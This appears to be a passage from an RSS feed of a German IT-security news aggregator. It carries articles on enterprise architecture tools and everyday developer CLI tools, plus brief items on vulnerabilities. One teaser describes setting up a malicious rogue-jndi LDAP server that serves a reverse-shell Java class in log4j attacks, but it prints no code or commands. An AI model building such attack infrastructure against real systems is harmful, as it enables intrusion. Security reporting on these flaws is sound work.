<li><p>eine breite Beteiligung in Sachen Dokumentationserstellung und -überprüfung fördern.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.erwin.com/de-de/products/erwin-evolve/" title="Quest Erwin Evolve" target="_blank" rel="noopener">Quest Erwin Evolve</a></strong></p>



<p class="wp-block-paragraph">Das Erwin Evolve Tool von Quest hat sich von einem Datenmodellierungs-Tool zu einem System für Enterprise-Architecture- und Geschäftsprozess-Modellierung weiterentwickelt. Um die Komplexität moderner, ineinandergreifender Softwaresysteme und der von ihnen gemanagten Geschäftsprozesse zu durchdringen, können Anwender auf benutzerdefinierte Datenstrukturen zurückgreifen. Das Web-Tool erstellt Modelle, rollenbasierte Diagramme und andere Visualisierungen, die in allgemein zugängliche Dashboards einfließen. Zum Paket gehört ein KI-basiertes Modellierungs-Tool, das Whiteboard-Skizzen integrieren kann.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>einen digitalen Zwilling für die strategische Modellierung der Enterprise Data Architecture erstellen;</p></li>



<li><p>Customer Journeys verstehen;</p></li>



<li><p>Services und Systeme mit Application Portfolio Management tracken.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="LeanIX Enterprise Architecture Suite" href="https://www.leanix.net/de/produkte/enterprise-architecture-management" target="_blank" rel="noopener">SAP LeanIX Enterprise Architecture Suite</a></strong></p>



<p class="wp-block-paragraph">Die Tool-Sammlung von LeanIX umfasst unter anderem Enterprise Architecture Management und andere Bereiche, die für Aufgaben wie <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/cloud-computing,3454" target="_blank">SaaS</a>– und Value-Stream-Management wichtig sind – etwa um Cloud-Deployments und darauf laufende Services zu tracken. Die Daten die dabei über die IT-Infrastruktur gesammelt werden, fließen in ein grafisches Dashboard ein. Das Tool ist eng mit wichtigen Cloud-Workflow-Tools wie Confluence, Jira, Signavio und Lucidchart integriert. Das ist für Teams von Vorteil, die diese Tools bereits nutzen, um ihre Entwicklungsstrategien zu planen und umzusetzen. Seit November 2023 <a href="https://www.leanix.net/de/unternehmen/pressemeldungen/leanix-gehoert-jetzt-zu-sap">ist LeanIX Teil von SAP</a>.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Anwendungsmodernisierung und Cloud-Migration managen;</p></li>



<li><p>Obsoleszenz von Software-Services evaluieren;</p></li>



<li><p>Kosten kontrollieren und managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.servicenow.com/de/" title="ServiceNow" target="_blank" rel="noopener">ServiceNow</a></strong></p>



<p class="wp-block-paragraph">Die Tool-Sammlung von ServiceNow lässt sich auf verschiedene Architekturtypen herunterbrechen, darunter Assets, <a href="https://www.computerwoche.de/article/2785626/wie-devops-die-it-beschleunigen.html" target="_blank" class="idgGlossaryLink">DevOps</a>, Security und Service. Die Tools katalogisieren die unterschiedlichen Hardware- und Softwareplattformen, um Workflows und Datenflüsse im Unternehmen abzubilden und zu verstehen. Ausführliche Reportings und detaillierte Dashboards ermöglichen Analysen, auf deren Grundlage Risiken minimiert und die Ausfallsicherheit der Systeme erhöht werden können.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Tracken von Assets, Services und Systemen, die das Unternehmen ausmachen;</p></li>



<li><p>Governance-Themen, Risikobegrenzung, IT-Management und Security Operations werden in einer Plattform zusammengeführt;</p></li>



<li><p>durch die Integration von CRM-Tools lassen sich auch kundenorientierte Services managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://sparxsystems.com/products/ea/" title="Sparx Systems" target="_blank" rel="noopener">Sparx Systems</a></strong></p>



<p class="wp-block-paragraph">Um Teams und Projekte verschiedener Größe und Komplexität zu unterstützen, hat Sparx vier Versionen seines EA-Tools entwickelt. Allen gemeinsam ist eine UML-basierte Modellierung, mit der sich die Komponenten komplexer Systeme tracken lassen. Eine Simulations-Engine ermöglicht “War Gaming” und vermittelt ein Verständnis darüber, wie sich Fehler ausbreiten und kaskadieren können. Sparx stellt zudem eine Vielzahl von vorgefertigten Design Patterns bereit, um Teams bei der Modellierung zu unterstützen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Nachfrage- und Lastveränderungen zur Prognose künftiger Anforderungen simulieren;</p></li>



<li><p>(potenzielle) Probleme durch eine Verbindungs-Matrix im Auge behalten;</p></li>



<li><p>Dokumentation erstellen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.teamblue.unicomsi.com/products/system-architect/" title="Unicom System Architect" target="_blank" rel="noopener">Unicom System Architect</a></strong></p>



<p class="wp-block-paragraph">System Architect ist eines der Angebote aus Unicoms Team Blue. Es handelt sich um ein Tool, das ein Metamodell verwendet, um automatisiert so viele Daten wie möglich über die laufenden Systeme zu sammeln – manchmal auch durch ein Reverse Engineering von Datenflüssen. Dieses systemweite Datenmodell kann über benutzerdefinierte Dashboards Teammitgliedern aller Rollen zugänglich gemacht werden. Ein weiteres erwähnenswertes Feature: Die Ressourcenzuweisung lässt sich mit Hilfe von Simulationen optimieren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Was-wäre-wenn-Fragen zum Architekturmodell stellen;</p></li>



<li><p>ein Metamodell von Daten und Systemen aufbauen;</p></li>



<li><p>Migrations- und Transformationspläne erstellen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.valueblue.com/bluedolphin" title="ValueBlue BlueDolphin" target="_blank" rel="noopener">ValueBlue BlueDolphin</a></strong></p>



<p class="wp-block-paragraph">Dieses EA-Tool sammelt Daten auf dreierlei Art:</p>



<ol class="wp-block-list">
<li><p>Es importiert Basisdaten auf der Grundlage standardgesteuerter Automatisierung (ITSM, SAM).</p></li>



<li><p>Es arbeitet mit den Dateiformaten von Architekten und Systemdesignern – etwa ArchiMate oder BPMN.</p></li>



<li><p>Es gibt Fragebögen an andere Stakeholder heraus, die auf anpassbaren Vorlagen basieren.</p></li>
</ol>



<p class="wp-block-paragraph">Die aufbereiteten Informationen werden in einer visuellen Umgebung bereitgestellt, die Auskunft über die historische Entwicklung von Systemen gibt.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>systemweite Daten von internen und externen Stakeholdern automatisiert und formularbasiert erfassen;</p></li>



<li><p>zukunftsorientierte Reportings erzeugen, um den Change zu überwachen und voranzutreiben;</p></li>



<li><p>Kooperation und Zusammenarbeit durch offenes Data Reporting fördern.</p></li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.cio.com/article/196069/top-enterprise-architecture-tools.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CIO.com erschienen. </strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[9 Kommandozeilen-Tools, die jeder Dev braucht]]></title>
<description><![CDATA[Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.
					Foto: SkillUp | shutterstock.com




Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie lieben – andere, weil ihnen nich...]]></description>
<link>https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." title="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." src="https://images.computerwoche.de/bdb/3392868/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.</p></figcaption></figure><p class="imageCredit">
					Foto: SkillUp | shutterstock.com</p></div>




<p class="wp-block-paragraph">Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" title="lieben" target="_blank">lieben</a> – andere, weil ihnen nichts anderes übrig bleibt. Egal zu welcher Kategorie Sie sich zählen: Diese neun CLI-Tools helfen Ihrer Produktivität und Effizienz (zusätzlich) <a href="https://www.computerwoche.de/article/2816175/so-motivieren-sie-softwareentwickler.html" title="auf die Sprünge" target="_blank">auf die Sprünge</a>.</p>



<h2 class="wp-block-heading"><a href="https://tldr.sh/" target="_blank" rel="noreferrer noopener">tldr</a></h2>



<p class="wp-block-paragraph">Keine Angst, wir ersparen Ihnen an dieser Stelle eine langwierige, faszinative Abhandlung über die ganz eigene Magie, die die Unix-Shell entfaltet. Fakt ist: Wenn man mit ihr arbeiten will, ist es manchmal erforderlich, vorher ein Handbuch zu lesen. Unix Docs (auch man- oder manual pages) sind diesbezüglich allerdings ein zweischneidiges Schwert: Die benötigte Information ist vorhanden – es ist nur die Frage, wo. Den Teil der <a href="https://www.computerwoche.de/article/2791591/so-erstellen-sie-eine-moderne-dokumentation-fuer-anwendungen.html" title="Dokumentation" target="_blank">Dokumentation</a> aufzuspüren, den Sie gerade benötigen, kann ein entmutigender Task sein. Zwar kann die gute alte Befehlszeile dabei helfen – um ein offizielles Handbuch aufzurufen, genügt:</p>



<p class="wp-block-paragraph"><code>$ man </code></p>



<p class="wp-block-paragraph">Allerdings zeichnen sich man-pages vor allem durch ihre Informationsdichte aus – und die Tatsache, dass sie manchmal aktuelle Informationen für neuere Tools vermissen lassen. Das CLI-Tool <code>tldr</code> versetzt Sie in die Lage, zielgerichteter zu suchen:</p>



<p class="wp-block-paragraph"><code>$ tldr </code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="tldr in Aktion." title="tldr in Aktion." src="https://images.computerwoche.de/bdb/3392869/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">tldr in Aktion.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Falls Sie <code>npm</code> installiert haben, ist die <code>tldr</code>-Installation nur einen kurzen Befehl entfernt:</p>



<p class="wp-block-paragraph"><code>npm install -g tldr</code></p>



<h2 class="wp-block-heading"><a href="https://ngrok.com/download" target="_blank" rel="noreferrer noopener">ngrok</a></h2>



<p class="wp-block-paragraph">Sobald Sie <code>tldr</code> installiert haben, können Sie damit viele weitere Befehle erkunden. Zum Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr ngrok</code></p>



<p class="wp-block-paragraph"><code>Reverse proxy that creates a secure tunnel from a public endpoint to a locally running web service.</code></p>



<p class="wp-block-paragraph">Mit <code>ngrok</code> eröffnet sich Ihnen eine stressfreie Möglichkeit, von einem Remote-Browser auf eine Entwicklungsmaschine zuzugreifen. Aber das Tool kann noch weit mehr. Sie können damit beispielsweise in der Cloud entwickeln und die Ergebnisse im Browser in Augenschein nehmen. Zudem können Sie mit <code>ngrok</code> auch schnell und einfach laufende Services über HTTPS veröffentlichen – ohne sich mit der Security-Infrastruktur herumschlagen zu müssen. Angenommen, Sie bauen einen Service Worker auf, der HTTPS benötigt, dann ist alles, was Sie für einen sicheren Kontext tun müssen, <code>ngrok</code> zu starten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." title="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." src="https://images.computerwoche.de/bdb/3392870/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Ein Beispiel, bei dem der HTTP-Port 8080 freigegeben wird:</p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph">Der <code>ngrok</code>-Output sieht wie folgt aus:</p>



<p class="wp-block-paragraph"><code>https://f951-34-67-117-59.ngrok-free.app -&gt; <a href="https://localhost:8080/" title="http://localhost:8080" target="_blank" rel="noopener">http://localhost:8080</a></code></p>



<p class="wp-block-paragraph">Anschließend kann jedermann die zugewiesene URL aufrufen (machen Sie sich keine Mühe).</p>



<h2 class="wp-block-heading"><a href="https://www.gnu.org/software/screen/manual/screen.html" target="_blank" rel="noreferrer noopener">screen</a></h2>



<p class="wp-block-paragraph">Mit diesem Befehlszeilen-Tool können Sie eine Shell-Sitzung mit oder ohne laufenden Prozess “beiseite legen” und sie anschließend zu einem beliebigen Zeitpunkt fortsetzen – auch wenn Sie die ursprüngliche Session beenden.</p>



<p class="wp-block-paragraph"><code>$ tldr screen</code></p>



<p class="wp-block-paragraph"><code>Hold a session open on a remote server. Manage multiple windows with a single SSH connection.</code></p>



<p class="wp-block-paragraph">Nehmen wir an, Sie starten <code>ngrok</code>, um remote auf eine <a href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" title="Webanwendung" target="_blank">Webanwendung</a> zuzugreifen: Sie starten den Prozess, lassen diesen dann in <code>screen</code> laufen und programmieren so lange etwas. Währenddessen läuft <code>ngrok</code> die ganze Zeit weiter – Sie können über <code>screen</code> jederzeit wieder darauf zugreifen. Veranschaulicht in Code würde das wie folgt aussehen:</p>



<p class="wp-block-paragraph"><code>$ screen</code></p>



<p class="wp-block-paragraph"><code>// Now we are in a new session</code></p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph"><code>// Now ngrok is running, exposing http port 8080</code></p>



<p class="wp-block-paragraph"><code>Type ctrl-a</code></p>



<p class="wp-block-paragraph"><code>// Now we are in screen's command mode</code></p>



<p class="wp-block-paragraph"><code>Type the "d" key, to "detach".</code></p>



<p class="wp-block-paragraph"><code>// Now you are back in the shell that you started in, while screen is running your ngrok command in the background:</code></p>



<p class="wp-block-paragraph"><code>$ screen -list</code></p>



<p class="wp-block-paragraph"><code>There is a screen on:</code></p>



<p class="wp-block-paragraph"><code> 128861.pts-0.dev3 (04/25/24 14:36:58) (Detached)</code></p>



<p class="wp-block-paragraph"><strong>Tipp</strong></p>



<p class="wp-block-paragraph"> Wenn Sie eine laufende Sitzung, in der Sie sich gerade befinden, benennen wollen, nutzen Sie die Tastenkombination Strg + A und geben <code>:sessionname </code> ein. Das ist besonders nützlich, wenn Sie mit mehreren Screen-Instanzen arbeiten wollen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Screen ist ein umfangreiches und potentes CLI-Tool." title="Screen ist ein umfangreiches und potentes CLI-Tool." src="https://images.computerwoche.de/bdb/3392871/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Screen ist ein umfangreiches und potentes CLI-Tool.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Wenn wie im Beispiel nur eine <code>screen</code>-Instanz läuft, führt der Befehl <code>$ screen -r</code> (für “re-attach”) Sie zurück zu Ihrer <code>ngrok</code>-Sitzung. Im Fall mehrerer Screens können Sie diese mit Hilfe ihrer ID wieder aufrufen:</p>



<p class="wp-block-paragraph"><code>$ screen -r </code></p>



<p class="wp-block-paragraph">Wenn Sie Ihre Session endgültig beenden wollen, beenden Sie ngrok mit Strg + C und geben anschließend <code>exit</code> in die Kommandozeile ein.</p>



<h2 class="wp-block-heading"><a href="https://sdkman.io/" target="_blank" rel="noreferrer noopener">sdkman</a> &amp; <a href="https://github.com/nvm-sh/nvm" target="_blank" rel="noreferrer noopener">nvm</a></h2>



<p class="wp-block-paragraph">Wenn Sie <a href="https://www.computerwoche.de/article/2831436/darum-bleibt-java-relevant.html" title="Java" target="_blank">Java</a> oder <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="JavaScript" target="_blank">JavaScript</a> auf einem Server verwenden, sollten Sie sich mit <code>sdkman</code> (für Java) und <code>nvm</code> (für Node) vertraut machen. Beide Kommandozeilen-Tools sind nützlich, wenn es darum geht, mit mehreren Programmiersprachenversionen auf dem selben Rechner zu jonglieren – und dabei sowohl Path Adjustment als auch Umgebungsvariablen überflüssig machen. </p>



<p class="wp-block-paragraph">Mit <code>sdkman</code> können Sie beispielsweise neuere Java-Versionen erkunden und anschließend wieder zum aktuellen LTS-Release springen. Dieser Prozess wird durch das <code>sdk</code>-Kommando abstrahiert.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." title="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." src="https://images.computerwoche.de/bdb/3392872/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an – inklusive derjenigen, die gerade in Benutzung ist.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Zwischen den Versionen zu wechseln, gestaltet sich denkbar einfach – <code>$ sdk use java 19-open</code> führt Sie direkt zu JDK Version 19.</p>



<p class="wp-block-paragraph"><code>$ tldr sdk</code></p>



<p class="wp-block-paragraph"><code>Manage parallel versions of multiple Software Development Kits.</code></p>



<p class="wp-block-paragraph"><code>Supports Java, Groovy, Scala, Kotlin, Gradle, Maven, Vert.x and many others.</code></p>



<p class="wp-block-paragraph">Die <code>nvm</code>-Utility funktioniert ganz ähnlich:</p>



<p class="wp-block-paragraph"><code>$ tldr nvm</code></p>



<p class="wp-block-paragraph"><code>Install, uninstall or switch between Node.js versions.</code></p>



<p class="wp-block-paragraph"><code>Supports version numbers like "12.8" or "v16.13.1", and labels like "stable", "system", etc.</code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Ein Blick auf nvm." title="Ein Blick auf nvm." src="https://images.computerwoche.de/bdb/3392873/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Ein Blick auf nvm.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/junegunn/fzf" target="_blank" rel="noreferrer noopener">fzf</a></h2>



<p class="wp-block-paragraph">Sowohl <code>grep</code> als auch <code>find</code> sind Standardbestandteile der Kommandozeilen-Befehlspalette. Allerdings sind beide Tools nicht so funktional, wie sie sein sollten. Das ruft <code>fzf</code> auf den Plan – einen “Fuzzy File Finder”. Mit “Fuzzy” ist dabei gemeint, dass die Details zu dem, was Sie suchen, nicht unbedingt klar definiert sein müssen. Ein Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr fzf</code></p>



<p class="wp-block-paragraph"><code>Command-line fuzzy finder.</code></p>



<p class="wp-block-paragraph"><code>Similar to sk.</code></p>



<p class="wp-block-paragraph">Sobald Sie <code>fzf</code> starten, indiziert das CLI-Tool umgehend das Dateisystem, um Ergebnisvorschläge für Ihre Suchen zu unterbreiten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." title="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." src="https://images.computerwoche.de/bdb/3392874/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Aus 878.937 Möglichkeiten hat <code>fzf</code> die 25 Dateien und Verzeichnisse ausgewählt, die unseren Anforderungen entsprechen könnten – und das völlig ohne Umwege.</p>



<h2 class="wp-block-heading"><a href="https://github.com/ogham/exa" target="_blank" rel="noreferrer noopener">exa</a></h2>



<p class="wp-block-paragraph">Mit <code>exa</code> werden langweilige alte <code>ls</code>-Listings schöner und nützlicher:</p>



<p class="wp-block-paragraph"><code>$ tldr</code></p>



<p class="wp-block-paragraph"><code>A modern replacement for ls (List directory contents).</code></p>



<p class="wp-block-paragraph">Für eine <a href="https://www.computerwoche.de/article/2834060/10-wege-zur-besseren-developer-experience.html" title="bessere Developer Experience" target="_blank">bessere Developer Experience</a> ohne mentalen Overhead statten Sie <code>ls</code> einfach mit einem <code>exa</code>-Alias aus. Das Tool respektiert die meisten <code>ls</code>-Standardoptionen – <code>exa -l</code> funktioniert also (beispielsweise) genau so, wie Sie es erwarten würden.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Exa ist das neue ls." title="Exa ist das neue ls." src="https://images.computerwoche.de/bdb/3392875/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Exa ist das neue ls.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/sharkdp/bat" target="_blank" rel="noreferrer noopener">bat</a></h2>



<p class="wp-block-paragraph">Die <code>bat</code>-Utility ähnelt dem <code>cat</code>-Tool – ist aber besser:</p>



<p class="wp-block-paragraph"><code>$ tldr bat</code></p>



<p class="wp-block-paragraph"><code>Print and concatenate files.</code></p>



<p class="wp-block-paragraph"><code>A cat clone with syntax highlighting and Git integration.</code></p>



<p class="wp-block-paragraph">Es handelt sich hierbei im Wesentlichen um eine Komfort- beziehungsweise <a href="https://www.computerwoche.de/article/2821891/8-wege-um-top-entwickler-zu-halten.html" title="Developer-Experience-Optimierung" target="_blank">Developer-Experience-Optimierung</a> – ähnlich wie im Fall von <code>exa</code>. Wenn Sie <code>bat</code> verwenden, erwartet Sie ein vollwertiger File Viewer – inklusive Title, Borders, Line Numbers und insbesondere einer hilfreichen Syntax-Highlighting-Funktion für Programmiersprachen oder Konfigurationsdateien. Dabei reagiert <code>bat</code> auf less/more-Befehle – und wird mit “<code>q</code>” beendet. Die Navigation erfolgt über die Pfeiltasten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." title="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." src="https://images.computerwoche.de/bdb/3392876/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/NetHack/NetHack" target="_blank" rel="noreferrer noopener">nethack</a></h2>



<p class="wp-block-paragraph">Ein absoluter Kommandozeilen-Klassiker ist <code>nethack</code> – der ursprüngliche, Konsolen-basierte ASCII <a href="https://de.wikipedia.org/wiki/NetHack" title="Dungeon Crawler" target="_blank" rel="noopener">Dungeon Crawler</a>. Das CLI-Tool wird Ihre Produktivität zwar nicht direkt ankurbeln – kann aber durchaus dabei helfen, ein paar Minuten zur Ruhe zu kommen, um komplexe Dev-Probleme zu durchdringen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." title="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." src="https://images.computerwoche.de/bdb/3392877/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Es gibt neuere Versionen des Nethack-Konzepts – manchmal fährt man jedoch mit dem Original am besten.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2337138/9-command-line-jewels-for-your-developer-toolkit.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.<br></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Überschreiben von Dateien in apache-commons-compress, apache-ivy, brotli-java und zstd-jni (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3694295/it-security-nachrichten/ueberschreiben-von-dateien-in-apache-commons-compress-apache-ivy-brotli-java-und-zstd-jni-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694295/it-security-nachrichten/ueberschreiben-von-dateien-in-apache-commons-compress-apache-ivy-brotli-java-und-zstd-jni-suse/</guid>
<pubDate>Sat, 25 Jul 2026 18:53:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Installing Rogue-jndi on Kali Linux]]></title>
<description><![CDATA[Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example)...]]></description>
<link>https://tsecurity.de/de/3694238/it-security-nachrichten/installing-rogue-jndi-on-kali-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694238/it-security-nachrichten/installing-rogue-jndi-on-kali-linux/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]</p>
<p>The post <a href="https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/">Installing Rogue-jndi on Kali Linux</a> appeared first on <a href="https://www.hackingtutorials.org/">Hacking Tutorials</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fastjson 1.x RCE Vulnerability Targeted in Attacks With No Patched Available]]></title>
<description><![CDATA[Security firms ThreatBook and Imperva say attackers are targeting a critical flaw in Fastjson, Alibaba's JSON library for Java. In affected Spring Boot applications, a malicious JSON request can execute code without authentication, with the privileges of the Java process.

Tracked as CVE-2026-167...]]></description>
<link>https://tsecurity.de/de/3694231/it-security-nachrichten/fastjson-1x-rce-vulnerability-targeted-in-attacks-with-no-patched-available/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694231/it-security-nachrichten/fastjson-1x-rce-vulnerability-targeted-in-attacks-with-no-patched-available/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security firms ThreatBook and Imperva say attackers are targeting a critical flaw in Fastjson, Alibaba's JSON library for Java. In affected Spring Boot applications, a malicious JSON request can execute code without authentication, with the privileges of the Java process.

Tracked as CVE-2026-16723, the vulnerability carries an Alibaba-assigned CVSS score of 9.0. The confirmed chain requires]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in apache-commons-compress, apache-ivy, brotli-java und zstd-jni (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3693996/unix-server/security-ueberschreiben-von-dateien-in-apache-commons-compress-apache-ivy-brotli-java-und-zstd-jni-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693996/unix-server/security-ueberschreiben-von-dateien-in-apache-commons-compress-apache-ivy-brotli-java-und-zstd-jni-suse/</guid>
<pubDate>Sat, 25 Jul 2026 16:00:54 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Android CLI Now Stable 1.0: Accelerate developing for Android using any agent]]></title>
<description><![CDATA[Posted by Simona Milanovic and Ben Trengrove, Developer Relations Engineers
As Android developers, you have many choices when it comes to the agents, tools, command-line interfaces (CLI), and LLMs you use for app development. Whether you use Gemini in Android Studio,  Antigravity 2.0, Antigravity...]]></description>
<link>https://tsecurity.de/de/3693514/android-tipps/android-cli-now-stable-10-accelerate-developing-for-android-using-any-agent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693514/android-tipps/android-cli-now-stable-10-accelerate-developing-for-android-using-any-agent/</guid>
